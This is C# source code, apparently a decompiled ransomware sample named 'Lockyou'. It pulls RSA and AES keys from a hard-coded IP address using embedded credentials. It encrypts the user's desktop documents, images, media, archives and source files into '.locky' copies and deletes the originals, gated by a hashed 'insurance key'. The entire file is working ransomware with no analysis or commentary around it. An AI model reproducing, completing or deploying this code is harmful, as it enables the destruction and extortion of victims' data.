1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156
| using System; using System.IO; using System.Net; using System.Security.Cryptography; using System.Text;
namespace Lockyou.LockyCore { public class AESCrypto { public AESCrypto() { this.BACKEND_URL = "http://39.101.170.47/"; this.PRIVATE_KEY = this.GetHttpContent(this.BACKEND_URL + "privateKey"); this.AES_KEY_ENC = this.GetHttpContent(this.BACKEND_URL + "encryptedAesKey"); this.AES_KEY = this.DecryptRSA(this.AES_KEY_ENC, this.PRIVATE_KEY); }
private string GetHttpContent(string url) { HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(url); httpWebRequest.Method = "GET"; httpWebRequest.ContentType = "application/x-www-form-urlencoded"; string str = Convert.ToBase64String(Encoding.ASCII.GetBytes("C2bAseUs2r:C@PsasR2")); httpWebRequest.Headers[HttpRequestHeader.Authorization] = "Basic " + str; HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse(); string result; using (StreamReader streamReader = new StreamReader(httpWebResponse.GetResponseStream())) { result = streamReader.ReadToEnd(); } return result; }
private byte[] DecryptRSA(string encryptedData, string privateKey) { byte[] result; using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider()) { rsacryptoServiceProvider.FromXmlString(privateKey); byte[] rgb = Convert.FromBase64String(encryptedData); result = rsacryptoServiceProvider.Decrypt(rgb, false); } return result; }
public int EncryptFileStart(string insureKey) { MD5 md = new MD5CryptoServiceProvider(); StringBuilder stringBuilder = new StringBuilder(); byte[] array = md.ComputeHash(Encoding.Default.GetBytes(insureKey)); for (int i = 0; i < array.Length; i++) { stringBuilder.Append(array[i].ToString("x2")); } bool flag = stringBuilder.ToString() != "7a2ca8a306260205c1cd46dad0fbd598"; int result; if (flag) { Console.WriteLine("Incorrect insurance key!"); result = 0; } else { int num = 0; foreach (string searchPattern in this.FILE_TYPES) { string[] files = Directory.GetFiles(this.DESKTOP_PATH, searchPattern); foreach (string text in files) { this.EncryptFile(text, text + ".locky"); num++; } } result = num; } return result; }
private void EncryptFile(string inputFile, string outputFile) { using (AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider()) { aesCryptoServiceProvider.Key = this.AES_KEY; aesCryptoServiceProvider.GenerateIV(); using (ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateEncryptor()) { using (FileStream fileStream = new FileStream(inputFile, FileMode.Open)) { using (FileStream fileStream2 = new FileStream(outputFile, FileMode.Create)) { using (CryptoStream cryptoStream = new CryptoStream(fileStream2, cryptoTransform, CryptoStreamMode.Write)) { fileStream2.Write(aesCryptoServiceProvider.IV, 0, aesCryptoServiceProvider.IV.Length); fileStream.CopyTo(cryptoStream); } } } } } File.Delete(inputFile); }
private string BACKEND_URL;
private string PRIVATE_KEY;
private string AES_KEY_ENC;
private byte[] AES_KEY;
private string DESKTOP_PATH = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory);
private string[] FILE_TYPES = new string[] { "*.txt", "*.xlsx", "*.jpg", "*.png", "*.gif", "*.pdf", "*.mp4", "*.wav", "*.mp3", "*.bak", "*.docx", "*.pptx", "*.gif", "*.zip", "*.csv", "*.sql", "*.ini", "*.html", "*.php", "*.js", "*.css", "*.py", "*.cs", "*.cpp", "*.c" }; } }
|